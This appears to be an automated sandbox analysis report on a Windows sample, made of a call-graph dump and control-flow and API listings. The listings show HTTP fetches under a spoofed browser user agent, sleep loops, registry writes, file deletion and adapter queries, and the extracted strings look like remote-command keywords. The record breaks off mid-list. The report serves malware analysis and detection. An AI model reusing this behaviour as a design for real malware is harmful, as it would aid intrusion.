2adb489 __EH_prolog 21315->21316 21317 2ae23dc std::bad_exception::bad_exception 59 API calls 21316->21317 21318 2adb49a Mailbox 21317->21318 21318->21311 21320 2ad3755 InterlockedCompareExchange 21319->21320 21321 2ad3770 21319->21321 21320->21321 21323 2ad3765 21320->21323 21322 2ae0a50 Mailbox 68 API calls 21321->21322 21325 2ad3779 21322->21325 21324 2ad32ab 78 API calls 21323->21324 21324->21321 21326 2ad29ee 76 API calls 21325->21326 21327 2ad378e 21326->21327 21327->20246 21357 2ae35f0 21328->21357 21330 2ad53c8 21330->20259 21331 2ae3849 21330->21331 21332 2ae3855 ___BuildCatchObject 21331->21332 21333 2ae388b 21332->21333 21334 2ae3873 21332->21334 21336 2ae3883 ___BuildCatchObject 21332->21336 21499 2ae9732 21333->21499 21335 2ae5d9b __read_nolock 59 API calls 21334->21335 21338 2ae3878 21335->21338 21336->20257 21341 2ae4e35 __read_nolock 9 API calls 21338->21341 21341->21336 21345 2ae39d3 ___BuildCatchObject 21344->21345 21346 2ae39ff 21345->21346 21347 2ae39e7 21345->21347 21349 2ae9732 __lock_file 60 API calls 21346->21349 21354 2ae39f7 ___BuildCatchObject 21346->21354 21348 2ae5d9b __read_nolock 59 API calls 21347->21348 21350 2ae39ec 21348->21350 21351 2ae3a11 21349->21351 21352 2ae4e35 __read_nolock 9 API calls 21350->21352 21526 2ae395b 21351->21526 21352->21354 21354->20259 21360 2ae35fc ___BuildCatchObject 21357->21360 21358 2ae360e 21359 2ae5d9b __read_nolock 59 API calls 21358->21359 21361 2ae3613 21359->21361 21360->21358 21362 2ae363b 21360->21362 21363 2ae4e35 __read_nolock 9 API calls 21361->21363 21376 2ae9808 21362->21376 21371 2ae361e ___BuildCatchObject @_EH4_CallFilterFunc@8 21363->21371 21365 2ae3640 21366 2ae3649 21365->21366 21367 2ae3656 21365->21367 21368 2ae5d9b __read_nolock 59 API calls 21366->21368 21369 2ae367f 21367->21369 21370 2ae365f 21367->21370 21368->21371 21391 2ae9927 21369->21391 21372 2ae5d9b __read_nolock 59 API calls 21370->21372 21371->21330 21372->21371 21377 2ae9814 ___BuildCatchObject 21376->21377 21378 2ae882d __lock 59 API calls 21377->21378 21389 2ae9822 21378->21389 21379 2ae9896 21421 2ae991e 21379->21421 21380 2ae989d 21382 2ae89f4 __malloc_crt 59 API calls 21380->21382 21384 2ae98a4 21382->21384 21383 2ae9913 ___BuildCatchObject 21383->21365 21384->21379 21385 2ae914c __mtinitlocks InitializeCriticalSectionAndSpinCount 21384->21385 21388 2ae98ca RtlEnterCriticalSection 21385->21388 21386 2ae88b5 __mtinitlocknum 59 API calls 21386->21389 21388->21379 21389->21379 21389->21380 21389->21386 21411 2ae9771 21389->21411 21416 2ae97db 21389->21416 21399 2ae9944 21391->21399 21392 2ae9958 21393 2ae5d9b __read_nolock 59 API calls 21392->21393 21394 2ae995d 21393->21394 21395 2ae4e35 __read_nolock 9 API calls 21394->21395 21397 2ae368a 21395->21397 21396 2ae9b5b 21432 2af0770 21396->21432 21408 2ae36ac 21397->21408 21399->21392 21407 2ae9aff 21399->21407 21426 2af078e 21399->21426 21404 2af08bd __openfile 59 API calls 21405 2ae9b17 21404->21405 21406 2af08bd __openfile 59 API calls 21405->21406 21405->21407 21406->21407 21407->21392 21407->21396 21492 2ae97a1 21408->21492 21410 2ae36b2 21410->21371 21412 2ae977c 21411->21412 21413 2ae9792 RtlEnterCriticalSection 21411->21413 21414 2ae882d __lock 59 API calls 21412->21414 21413->21389 21415 2ae9785 21414->21415 21415->21389 21417 2ae97fc RtlLeaveCriticalSection 21416->21417 21418 2ae97e9 21416->21418 21417->21389 21424 2ae8997 RtlLeaveCriticalSection 21418->21424 21420 2ae97f9 21420->21389 21425 2ae8997 RtlLeaveCriticalSection 21421->21425 21423 2ae9925 21423->21383 21424->21420 21425->21423 21435 2af07a6 21426->21435 21428 2ae9ac5 21428->21392 21429 2af08bd 21428->21429 21443 2af08d5 21429->21443 21431 2ae9af8 21431->21404 21431->21407 21450 2af0659 21432->21450 21434 2af0789 21434->21397 21436 2af07bb 21435->21436 21439 2af07b4 21435->21439 21437 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 21436->21437 21438 2af07c8 21437->21438 21438->21439 21440 2ae5d9b __read_nolock 59 API calls 21438->21440 21439->21428 21441 2af07fb 21440->21441 21442 2ae4e35 __read_nolock 9 API calls 21441->21442 21442->21439 21444 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 21443->21444 21445 2af08e8 21444->21445 21446 2ae5d9b __read_nolock 59 API calls 21445->21446 21449 2af08fd 21445->21449 21447 2af0929 21446->21447 21448 2ae4e35 __read_nolock 9 API calls 21447->21448 21448->21449 21449->21431 21451 2af0665 ___BuildCatchObject 21450->21451 21452 2af067b 21451->21452 21455 2af06b1 21451->21455 21453 2ae5d9b __read_nolock 59 API calls 21452->21453 21454 2af0680 21453->21454 21456 2ae4e35 __read_nolock 9 API calls 21454->21456 21461 2af0722 21455->21461 21460 2af068a ___BuildCatchObject 21456->21460 21460->21434 21470 2ae8176 21461->21470 21463 2af06cd 21466 2af06f6 21463->21466 21464 2af0736 21464->21463 21465 2ae2eb4 _free 59 API calls 21464->21465 21465->21463 21467 2af06fc 21466->21467 21469 2af0720 21466->21469 21491 2af0f6d RtlLeaveCriticalSection 21467->21491 21469->21460 21471 2ae8199 21470->21471 21472 2ae8183 21470->21472 21471->21472 21474 2ae81a0 ___crtIsPackagedApp 21471->21474 21473 2ae5d9b __read_nolock 59 API calls 21472->21473 21475 2ae8188 21473->21475 21477 2ae81a9 AreFileApisANSI 21474->21477 21478 2ae81b6 MultiByteToWideChar 21474->21478 21476 2ae4e35 __read_nolock 9 API calls 21475->21476 21490 2ae8192 21476->21490 21477->21478 21479 2ae81b3 21477->21479 21480 2ae81d0 GetLastError 21478->21480 21481 2ae81e1 21478->21481 21479->21478 21482 2ae5d7a __dosmaperr 59 API calls 21480->21482 21483 2ae89f4 __malloc_crt 59 API calls 21481->21483 21482->21490 21484 2ae81e9 21483->21484 21485 2ae81f0 MultiByteToWideChar 21484->21485 21484->21490 21486 2ae8206 GetLastError 21485->21486 21485->21490 21487 2ae5d7a __dosmaperr 59 API calls 21486->21487 21488 2ae8212 21487->21488 21489 2ae2eb4 _free 59 API calls 21488->21489 21489->21490 21490->21464 21491->21469 21493 2ae97cf RtlLeaveCriticalSection 21492->21493 21494 2ae97b0 21492->21494 21493->21410 21494->21493 21495 2ae97b7 21494->21495 21498 2ae8997 RtlLeaveCriticalSection 21495->21498 21497 2ae97cc 21497->21410 21498->21497 21500 2ae9764 RtlEnterCriticalSection 21499->21500 21501 2ae9742 21499->21501 21503 2ae3891 21500->21503 21501->21500 21502 2ae974a 21501->21502 21504 2ae882d __lock 59 API calls 21502->21504 21505 2ae36f0 21503->21505 21504->21503 21508 2ae36ff 21505->21508 21511 2ae371d 21505->21511 21506 2ae370d 21507 2ae5d9b __read_nolock 59 API calls 21506->21507 21509 2ae3712 21507->21509 21508->21506 21508->21511 21515 2ae3737 _memmove 21508->21515 21510 2ae4e35 __read_nolock 9 API calls 21509->21510 21510->21511 21517 2ae38c3 21511->21517 21512 2ae5e41 __flsbuf 79 API calls 21512->21515 21514 2ae9d71 __ungetc_nolock 59 API calls 21514->21515 21515->21511 21515->21512 21515->21514 21516 2ae9d95 __write 79 API calls 21515->21516 21520 2aea72f 21515->21520 21516->21515 21518 2ae97a1 __fsopen 2 API calls 21517->21518 21519 2ae38c9 21518->21519 21519->21336 21521 2aea742 21520->21521 21525 2aea766 21520->21525 21522 2ae9d71 __ungetc_nolock 59 API calls 21521->21522 21521->21525 21523 2aea75f 21522->21523 21524 2ae9d95 __write 79 API calls 21523->21524 21524->21525 21525->21515 21527 2ae397e 21526->21527 21528 2ae396a 21526->21528 21530 2aea72f __flush 79 API calls 21527->21530 21540 2ae397a 21527->21540 21529 2ae5d9b __read_nolock 59 API calls 21528->21529 21531 2ae396f 21529->21531 21532 2ae398a 21530->21532 21533 2ae4e35 __read_nolock 9 API calls 21531->21533 21545 2aeb1db 21532->21545 21533->21540 21536 2ae9d71 __ungetc_nolock 59 API calls 21537 2ae3998 21536->21537 21549 2aeb066 21537->21549 21539 2ae399e 21539->21540 21541 2ae2eb4 _free 59 API calls 21539->21541 21542 2ae3a36 21540->21542 21541->21540 21543 2ae97a1 __fsopen 2 API calls 21542->21543 21544 2ae3a3c 21543->21544 21544->21354 21546 2aeb1e8 21545->21546 21548 2ae3992 21545->21548 21547 2ae2eb4 _free 59 API calls 21546->21547 21546->21548 21547->21548 21548->21536 21550 2aeb072 ___BuildCatchObject 21549->21550 21551 2aeb07f 21550->21551 21552 2aeb096 21550->21552 21553 2ae5d67 __read_nolock 59 API calls 21551->21553 21554 2aeb121 21552->21554 21556 2aeb0a6 21552->21556 21555 2aeb084 21553->21555 21557 2ae5d67 __read_nolock 59 API calls 21554->21557 21559 2ae5d9b __read_nolock 59 API calls 21555->21559 21560 2aeb0ce 21556->21560 21561 2aeb0c4 21556->21561 21558 2aeb0c9 21557->21558 21564 2ae5d9b __read_nolock 59 API calls 21558->21564 21571 2aeb08b ___BuildCatchObject 21559->21571 21563 2af0bc7 ___lock_fhandle 60 API calls 21560->21563 21562 2ae5d67 __read_nolock 59 API calls 21561->21562 21562->21558 21565 2aeb0d4 21563->21565 21566 2aeb12d 21564->21566 21567 2aeb0e7 21565->21567 21568 2aeb0f2 21565->21568 21569 2ae4e35 __read_nolock 9 API calls 21566->21569 21575 2aeb141 21567->21575 21572 2ae5d9b __read_nolock 59 API calls 21568->21572 21569->21571 21571->21539 21573 2aeb0ed 21572->21573 21590 2aeb119 21573->21590 21576 2af0e84 __commit 59 API calls 21575->21576 21578 2aeb14f 21576->21578 21577 2aeb1a5 21593 2af0dfe 21577->21593 21578->21577 21580 2aeb183 21578->21580 21583 2af0e84 __commit 59 API calls 21578->21583 21580->21577 21581 2af0e84 __commit 59 API calls 21580->21581 21586 2aeb17a 21583->21586 21602 2af0f6d RtlLeaveCriticalSection 21590->21602 21592 2aeb11f 21592->21571 21602->21592 21603 2ad6487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21604 2ad64ef GetTickCount 21603->21604 21681 2ad42c7 21603->21681 21682 2ad605a 21604->21682 21683 2ae2eec _malloc 59 API calls 21682->21683 21684 2ad606d 21683->21684 21685 40b72c 21686 40b761 21685->21686 21687 40b6f2 Sleep 21686->21687 21688 40b775 21686->21688 21688->21688 21689 4024ec 21690 40b5ed WaitForSingleObject 21689->21690 21692 40b66d 21693 40b673 Sleep 21692->21693 21694 40b93b 21693->21694 21695 40b00d RegCreateKeyExA 21696 40b01b 21695->21696 21697 40226e 21698 40227b 21697->21698 21699 4022bb 21697->21699 21700 40b414 lstrcmpiW 21698->21700 21701 402283 21698->21701 21700->21701 21702 40b8ce 21703 40b8d3 LoadLibraryExA 21702->21703 21704 4021e1 21703->21704 21705 40b2ef 21706 40b2f5 VirtualAlloc 21705->21706 21707 40b359 21705->21707 21706->21707 21707->21707 21708 2adf8da LoadLibraryA 21709 2adf9bd 21708->21709 21710 2adf903 GetProcAddress 21708->21710 21711 2adf9b6 FreeLibrary 21710->21711 21714 2adf917 21710->21714 21711->21709 21712 2adf929 GetAdaptersInfo 21712->21714 21713 2adf9b1 21713->21711 21714->21712 21714->21713 21715 2ae3a8f _Allocate 60 API calls 21714->21715 21715->21714 21716 2b4020e 21717 2b4afb3 DeleteFileA 21716->21717 21719 4026ba 21720 40b0d5 RegSetValueExA 21719->21720 21722 40bba1 RegCloseKey 21720->21722 21723 40bba7 21722->21723 21724 2adf7d6 CreateFileA 21725 2adf8d2 21724->21725 21729 2adf807 21724->21729 21726 2adf81f DeviceIoControl 21726->21729 21727 2adf8c8 FindCloseChangeNotification 21727->21725 21728 2adf894 GetLastError 21728->21727 21728->21729 21729->21726 21729->21727 21729->21728 21730 2ae3a8f _Allocate 60 API calls 21729->21730 21730->21729 21731 40223c GetCommandLineW 21732 40b040 CommandLineToArgvW 21731->21732 21733 40b942 GetLocalTime 21732->21733 21736 401f27 21733->21736 21737 401f3c 21736->21737 21740 401a1d 21737->21740 21739 401f45 21741 401a2c 21740->21741 21746 401a4f CreateFileA 21741->21746 21745 401a3e 21745->21739 21747 401a35 21746->21747 21752 401a7d 21746->21752 21754 401b4b LoadLibraryA 21747->21754 21748 401a98 DeviceIoControl 21748->21752 21750 401b3a FindCloseChangeNotification 21750->21747 21751 401b0e GetLastError 21751->21750 21751->21752 21752->21748 21752->21750 21752->21751 21763 402cb6 21752->21763 21766 402ca8 21752->21766 21755 401c21 21754->21755 21756 401b6e GetProcAddress 21754->21756 21755->21745 21757 401c18 FreeLibrary 21756->21757 21759 401b85 21756->21759 21757->21755 21758 401b95 GetAdaptersInfo 21758->21759 21759->21758 21760 402cb6 7 API calls 21759->21760 21761 401c15 21759->21761 21762 402ca8 12 API calls 21759->21762 21760->21759 21761->21757 21762->21759 21764 403061 7 API calls 21763->21764 21765 402cbf 21764->21765 21765->21752 21767 402e82 12 API calls 21766->21767 21768 402cb3 21767->21768 21768->21752

                                                                            Executed Functions

                                                                            Function 02AD72A7 Relevance: 95.2, APIs: 41, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 2ad72a7-2ad72bf InternetOpenA 1 2ad7385-2ad738b 0->1 2 2ad72c5-2ad7319 InternetSetOptionA * 3 call 2ae4a30 0->2 3 2ad738d-2ad7393 1->3 4 2ad73a7-2ad73b5 1->4 10 2ad731e-2ad733c InternetOpenUrlA 2->10 6 2ad7399-2ad73a6 call 2ad53ec 3->6 7 2ad7395-2ad7397 3->7 8 2ad73bb-2ad73df call 2ae4a30 call 2ad439c 4->8 9 2ad66f0-2ad66f2 4->9 6->4 7->4 8->9 31 2ad73e5-2ad7413 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae227c 8->31 11 2ad66fb-2ad66fd 9->11 12 2ad66f4-2ad66f9 9->12 13 2ad737e-2ad737f InternetCloseHandle 10->13 14 2ad733e 10->14 19 2ad66ff 11->19 20 2ad670a-2ad673e RtlEnterCriticalSection RtlLeaveCriticalSection 11->20 17 2ad6704 Sleep 12->17 13->1 18 2ad7342-2ad7368 InternetReadFile 14->18 17->20 23 2ad736a-2ad7371 18->23 24 2ad7373-2ad737a InternetCloseHandle 18->24 19->17 25 2ad678e 20->25 26 2ad6740-2ad674c 20->26 23->18 24->13 29 2ad6792 25->29 26->25 30 2ad674e-2ad675b 26->30 29->0 32 2ad675d-2ad6761 30->32 33 2ad6763-2ad6764 30->33 38 2ad7469-2ad7484 call 2ae227c 31->38 39 2ad7415-2ad7427 call 2ae227c 31->39 35 2ad6768-2ad678c call 2ae4a30 * 2 32->35 33->35 35->29 47 2ad773e-2ad7750 call 2ae227c 38->47 48 2ad748a-2ad748c 38->48 39->38 49 2ad7429-2ad743b call 2ae227c 39->49 56 2ad7799-2ad77a2 call 2ae227c 47->56 57 2ad7752-2ad7754 47->57 48->47 51 2ad7492-2ad7544 call 2ae2eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae4a30 * 5 call 2ad439c * 2 48->51 49->38 59 2ad743d-2ad744f call 2ae227c 49->59 114 2ad7546-2ad7548 51->114 115 2ad7581 51->115 66 2ad77a7-2ad77ab 56->66 57->56 60 2ad7756-2ad7794 call 2ae4a30 RtlEnterCriticalSection RtlLeaveCriticalSection 57->60 59->38 72 2ad7451-2ad7463 call 2ae227c 59->72 60->9 70 2ad77ad-2ad77bb call 2ad61f1 call 2ad62ff 66->70 71 2ad77cc-2ad77de call 2ae227c 66->71 85 2ad77c0-2ad77c7 call 2ad640a 70->85 82 2ad7afc-2ad7b0e call 2ae227c 71->82 83 2ad77e4-2ad77e6 71->83 72->9 72->38 82->9 94 2ad7b14-2ad7b42 call 2ae2eec call 2ae4a30 call 2ad439c 82->94 83->82 87 2ad77ec-2ad7803 call 2ad439c 83->87 85->9 87->9 99 2ad7809-2ad78d7 call 2ae2358 call 2ad1ba7 87->99 121 2ad7b4b-2ad7b52 call 2ae2eb4 94->121 122 2ad7b44-2ad7b46 call 2ad534d 94->122 112 2ad78de-2ad78ff RtlEnterCriticalSection 99->112 113 2ad78d9 call 2ad143f 99->113 118 2ad790b-2ad7941 RtlLeaveCriticalSection call 2ad3c67 call 2ad3d7e 112->118 119 2ad7901-2ad7908 112->119 113->112 114->115 120 2ad754a-2ad755c call 2ae227c 114->120 123 2ad7585-2ad75b3 call 2ae2eec call 2ae4a30 call 2ad439c 115->123 137 2ad7946-2ad7963 call 2ad826e 118->137 119->118 120->115 135 2ad755e-2ad757f call 2ad439c 120->135 121->9 122->121 144 2ad75b5-2ad75c4 call 2ae3529 123->144 145 2ad75f4-2ad75fd call 2ae2eb4 123->145 135->123 143 2ad7968-2ad796f 137->143 146 2ad7975-2ad79af call 2ada658 143->146 147 2ad7ae3-2ad7af7 call 2ad8f36 143->147 144->145 158 2ad75c6 144->158 156 2ad7734-2ad7737 145->156 157 2ad7603-2ad761b call 2ae3a8f 145->157 155 2ad79b4-2ad79bd 146->155 147->9 159 2ad7aad-2ad7ade call 2ad831d call 2ad33b2 155->159 160 2ad79c3-2ad79ca 155->160 156->47 170 2ad761d-2ad7625 call 2ad966a 157->170 171 2ad7627 157->171 162 2ad75cb-2ad75dd call 2ae2790 158->162 159->147 164 2ad79cd-2ad79d2 160->164 177 2ad75df 162->177 178 2ad75e2-2ad75f2 call 2ae3529 162->178 164->164 165 2ad79d4-2ad7a11 call 2ada658 164->165 174 2ad7a16-2ad7a1f 165->174 176 2ad7629-2ad765d call 2ada782 call 2ad3863 170->176 171->176 174->159 179 2ad7a25-2ad7a2b 174->179 189 2ad7662-2ad767e call 2ad5119 176->189 177->178 178->145 178->162 183 2ad7a2e-2ad7a33 179->183 183->183 186 2ad7a35-2ad7a70 call 2ada658 183->186 186->159 192 2ad7a72-2ad7aa6 call 2add04a 186->192 193 2ad7683-2ad76b4 call 2ad3863 call 2adaa28 189->193 197 2ad7aab-2ad7aac 192->197 199 2ad76b9-2ad76cb call 2adab42 193->199 197->159 201 2ad76d0-2ad76e1 199->201 202 2ad76e8-2ad76f7 Sleep 201->202 203 2ad76e3 call 2ad380b 201->203 205 2ad76ff-2ad7713 call 2ae1830 202->205 203->202 207 2ad771f-2ad772d 205->207 208 2ad7715-2ad771e call 2ad4100 205->208 207->156 210 2ad772f call 2ad380b 207->210 208->207 210->156
                                                                            APIs
                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02AD6704
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD670F
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD6720
                                                                            • _memset.LIBCMT ref: 02AD6775
                                                                            • _memset.LIBCMT ref: 02AD6784
                                                                            • InternetOpenA.WININET(?), ref: 02AD72B1
                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02AD72D9
                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02AD72F1
                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02AD7309
                                                                            • _memset.LIBCMT ref: 02AD7319
                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02AD7332
                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02AD7354
                                                                            • InternetCloseHandle.WININET(00000000), ref: 02AD7374
                                                                            • InternetCloseHandle.WININET(00000000), ref: 02AD737F
                                                                            • _memset.LIBCMT ref: 02AD73C7
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD73EA
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD73FB
                                                                            • _malloc.LIBCMT ref: 02AD7494
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD74A6
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD74B2
                                                                            • _memset.LIBCMT ref: 02AD74CC
                                                                            • _memset.LIBCMT ref: 02AD74DB
                                                                            • _memset.LIBCMT ref: 02AD74EB
                                                                            • _memset.LIBCMT ref: 02AD74FE
                                                                            • _memset.LIBCMT ref: 02AD7514
                                                                            • _malloc.LIBCMT ref: 02AD758A
                                                                            • _memset.LIBCMT ref: 02AD759B
                                                                            • _strtok.LIBCMT ref: 02AD75BB
                                                                            • _swscanf.LIBCMT ref: 02AD75D2
                                                                            • _strtok.LIBCMT ref: 02AD75E9
                                                                            • _free.LIBCMT ref: 02AD75F5
                                                                            • Sleep.KERNEL32(000007D0), ref: 02AD76ED
                                                                            • _memset.LIBCMT ref: 02AD7761
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD776E
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD7780
                                                                            • _sprintf.LIBCMT ref: 02AD781E
                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02AD78E2
                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02AD7916
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                            • API String ID: 696907137-1839899575
                                                                            • Opcode ID: f3f326d963d645fbba287e620b74e9f45185b598b21acd600bb54660895a8ae0
                                                                            • Instruction ID: e2c1af859a0dc4b8c1e48259fc615aa1014f0d519647c578b863262db5e3deca
                                                                            • Opcode Fuzzy Hash: f3f326d963d645fbba287e620b74e9f45185b598b21acd600bb54660895a8ae0
                                                                            • Instruction Fuzzy Hash: E432D131588381AFE739AB64DD40BAFBBEAAF89714F00081DF58A97290DF749405CF56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6487 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 213 2ad6487-2ad64e8 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 214 2ad64ef-2ad66ed GetTickCount call 2ad605a GetVersionExA call 2ae4a30 call 2ae2eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2ae4a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae2eec * 4 QueryPerformanceCounter Sleep call 2ae2eec * 2 call 2ae4a30 * 2 213->214 215 2ad64ea call 2ad42c7 213->215 258 2ad66f0-2ad66f2 214->258 215->214 259 2ad66fb-2ad66fd 258->259 260 2ad66f4-2ad66f9 258->260 262 2ad66ff 259->262 263 2ad670a-2ad673e RtlEnterCriticalSection RtlLeaveCriticalSection 259->263 261 2ad6704 Sleep 260->261 261->263 262->261 264 2ad678e 263->264 265 2ad6740-2ad674c 263->265 266 2ad6792-2ad72bf InternetOpenA 264->266 265->264 267 2ad674e-2ad675b 265->267 272 2ad7385-2ad738b 266->272 273 2ad72c5-2ad733c InternetSetOptionA * 3 call 2ae4a30 InternetOpenUrlA 266->273 268 2ad675d-2ad6761 267->268 269 2ad6763-2ad6764 267->269 271 2ad6768-2ad678c call 2ae4a30 * 2 268->271 269->271 271->266 274 2ad738d-2ad7393 272->274 275 2ad73a7-2ad73b5 272->275 283 2ad737e-2ad737f InternetCloseHandle 273->283 284 2ad733e 273->284 278 2ad7399-2ad73a6 call 2ad53ec 274->278 279 2ad7395-2ad7397 274->279 275->258 281 2ad73bb-2ad73df call 2ae4a30 call 2ad439c 275->281 278->275 279->275 281->258 296 2ad73e5-2ad7413 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae227c 281->296 283->272 288 2ad7342-2ad7368 InternetReadFile 284->288 292 2ad736a-2ad7371 288->292 293 2ad7373-2ad737a InternetCloseHandle 288->293 292->288 293->283 299 2ad7469-2ad7484 call 2ae227c 296->299 300 2ad7415-2ad7427 call 2ae227c 296->300 305 2ad773e-2ad7750 call 2ae227c 299->305 306 2ad748a-2ad748c 299->306 300->299 307 2ad7429-2ad743b call 2ae227c 300->307 314 2ad7799-2ad77ab call 2ae227c 305->314 315 2ad7752-2ad7754 305->315 306->305 309 2ad7492-2ad7544 call 2ae2eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae4a30 * 5 call 2ad439c * 2 306->309 307->299 317 2ad743d-2ad744f call 2ae227c 307->317 372 2ad7546-2ad7548 309->372 373 2ad7581 309->373 328 2ad77ad-2ad77bb call 2ad61f1 call 2ad62ff 314->328 329 2ad77cc-2ad77de call 2ae227c 314->329 315->314 318 2ad7756-2ad7794 call 2ae4a30 RtlEnterCriticalSection RtlLeaveCriticalSection 315->318 317->299 330 2ad7451-2ad7463 call 2ae227c 317->330 318->258 343 2ad77c0-2ad77c7 call 2ad640a 328->343 340 2ad7afc-2ad7b0e call 2ae227c 329->340 341 2ad77e4-2ad77e6 329->341 330->258 330->299 340->258 352 2ad7b14-2ad7b42 call 2ae2eec call 2ae4a30 call 2ad439c 340->352 341->340 345 2ad77ec-2ad7803 call 2ad439c 341->345 343->258 345->258 357 2ad7809-2ad78d7 call 2ae2358 call 2ad1ba7 345->357 379 2ad7b4b-2ad7b52 call 2ae2eb4 352->379 380 2ad7b44-2ad7b46 call 2ad534d 352->380 370 2ad78de-2ad78ff RtlEnterCriticalSection 357->370 371 2ad78d9 call 2ad143f 357->371 376 2ad790b-2ad796f RtlLeaveCriticalSection call 2ad3c67 call 2ad3d7e call 2ad826e 370->376 377 2ad7901-2ad7908 370->377 371->370 372->373 378 2ad754a-2ad755c call 2ae227c 372->378 381 2ad7585-2ad75b3 call 2ae2eec call 2ae4a30 call 2ad439c 373->381 404 2ad7975-2ad79bd call 2ada658 376->404 405 2ad7ae3-2ad7af7 call 2ad8f36 376->405 377->376 378->373 393 2ad755e-2ad757f call 2ad439c 378->393 379->258 380->379 402 2ad75b5-2ad75c4 call 2ae3529 381->402 403 2ad75f4-2ad75fd call 2ae2eb4 381->403 393->381 402->403 416 2ad75c6 402->416 414 2ad7734-2ad7737 403->414 415 2ad7603-2ad761b call 2ae3a8f 403->415 417 2ad7aad-2ad7ade call 2ad831d call 2ad33b2 404->417 418 2ad79c3-2ad79ca 404->418 405->258 414->305 428 2ad761d-2ad7625 call 2ad966a 415->428 429 2ad7627 415->429 420 2ad75cb-2ad75dd call 2ae2790 416->420 417->405 422 2ad79cd-2ad79d2 418->422 435 2ad75df 420->435 436 2ad75e2-2ad75f2 call 2ae3529 420->436 422->422 423 2ad79d4-2ad7a1f call 2ada658 422->423 423->417 437 2ad7a25-2ad7a2b 423->437 434 2ad7629-2ad76cb call 2ada782 call 2ad3863 call 2ad5119 call 2ad3863 call 2adaa28 call 2adab42 428->434 429->434 459 2ad76d0-2ad76e1 434->459 435->436 436->403 436->420 441 2ad7a2e-2ad7a33 437->441 441->441 444 2ad7a35-2ad7a70 call 2ada658 441->444 444->417 450 2ad7a72-2ad7aa6 call 2add04a 444->450 455 2ad7aab-2ad7aac 450->455 455->417 460 2ad76e8-2ad7713 Sleep call 2ae1830 459->460 461 2ad76e3 call 2ad380b 459->461 465 2ad771f-2ad772d 460->465 466 2ad7715-2ad771e call 2ad4100 460->466 461->460 465->414 468 2ad772f call 2ad380b 465->468 466->465 468->414
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(02B071B8), ref: 02AD64B6
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02AD64CD
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AD64D6
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02AD64E5
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AD64E8
                                                                            • GetTickCount.KERNEL32 ref: 02AD64F4
                                                                              • Part of subcall function 02AD605A: _malloc.LIBCMT ref: 02AD6068
                                                                            • GetVersionExA.KERNEL32(02B07010), ref: 02AD6521
                                                                            • _memset.LIBCMT ref: 02AD6540
                                                                            • _malloc.LIBCMT ref: 02AD654D
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • _malloc.LIBCMT ref: 02AD655D
                                                                            • _malloc.LIBCMT ref: 02AD6568
                                                                            • _malloc.LIBCMT ref: 02AD6573
                                                                            • _malloc.LIBCMT ref: 02AD657E
                                                                            • _malloc.LIBCMT ref: 02AD6589
                                                                            • _malloc.LIBCMT ref: 02AD6594
                                                                            • _malloc.LIBCMT ref: 02AD65A3
                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02AD65BA
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD65C3
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02AD65D2
